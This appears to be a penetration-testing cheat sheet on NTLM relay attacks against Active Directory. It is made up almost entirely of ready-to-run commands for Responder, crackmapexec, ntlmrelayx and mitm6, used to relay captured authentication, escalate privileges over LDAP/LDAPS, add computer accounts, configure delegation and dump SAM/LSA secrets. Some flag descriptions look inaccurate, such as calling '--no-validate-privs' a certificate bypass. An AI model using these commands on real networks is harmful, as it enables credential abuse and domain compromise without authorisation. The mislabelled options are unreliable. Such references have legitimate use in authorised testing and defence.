NTLM Relay Attacks

Understanding NTLM Relay

Core Concept

Instead of cracking the captured hashes by responder we can use these hashes to gain access to another machine.

Intercept NTLM authentication attempts (see Authentication Triggers and Forcing Techniques) and relay them to target systems without needing to crack password hashes.

Attack Flow:

Victim → Attacker (Relay Server) → Target System

• Victim initiates NTLM authentication to attacker

• Attacker forwards authentication to legitimate target

• Target grants access based on victim's credentials

• Attacker gains access as the victim

Requirements:

• Target systems without SMB signing being enabled or enabled but not enforced (By default, disabled on the normal workstations and enforced on the server)

• Victim authentication attempts either natural or forced

Relay type	Requirements
SMB to SMB	A domain user that is a local admin on the machine we are relaying the hash to
SMB to LDAP	LDAP server does not require signing (disabled or not enforced)

---

SMB Relay Attacks

Classic SMB to SMB Relay

Why? Relay SMB authentication between different SMB services for lateral movement.

# Identify relay targets (systems without SMB signing)
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt

# Basic SMB relay to multiple targets
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support

# Start the responder to relay the hashes
sudo responder -I <interface> -dw

---

Cross-Protocol Relay Attacks

SMB to LDAP Relay

Why? Relay SMB authentication to domain controllers for Active Directory privilege escalation.

LDAP Privilege Escalation

# Basic privilege escalation via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <low-priv-user>

# Add computer account via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer EVILCOMPUTER$ --computer-pass CompPass123!

# Delegate access permissions
python3 ntlmrelayx.py -t ldap://<DC-IP> --delegate-access --escalate-user <username>

# LDAP relay with DCSync attack setup
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <username> --dump

LDAPS (Secure LDAP) Relay

# Relay to LDAPS (encrypted LDAP)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username>

# LDAPS with certificate validation bypass
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username> --no-validate-privs

# Target specific LDAP operations
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer NEWPC$ --delegate-access

Requirements: Domain controller accessible, victim with domain privileges

Attack Value: Domain admin rights, DCSync capabilities, computer account creation

---

Advanced Relay Techniques

IPv6 + NTLM Relay Combination

Purpose: Combine IPv6 attacks with NTLM relay for enhanced targeting and stealth.

mitm6 + ntlmrelayx Integration

# Terminal 1: IPv6 DHCPv6 attack
sudo mitm6 -d <domain.com> --ignore-nofqdn

# Terminal 2: NTLM relay with IPv6 support
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username> --delegate-access

# Terminal 3: Monitor for incoming connections
sudo netstat -tuln | grep :445

Requirements: IPv6 enabled in target environment

Attack Value: More reliable targeting, DNS manipulation, stealth

Multi-Protocol Relay Chains

Purpose: Chain multiple relay operations across different protocols for complex attack paths.

# Multi-target relay with different protocols
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support

# Where mixed_targets.txt contains:
# smb://server1.domain.com
# http://webapp.domain.com
# ldap://dc.domain.com
# mssql://database.domain.com

# Chain with specific operations per protocol
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <user> \
    -tf smb_targets.txt --sam --lsa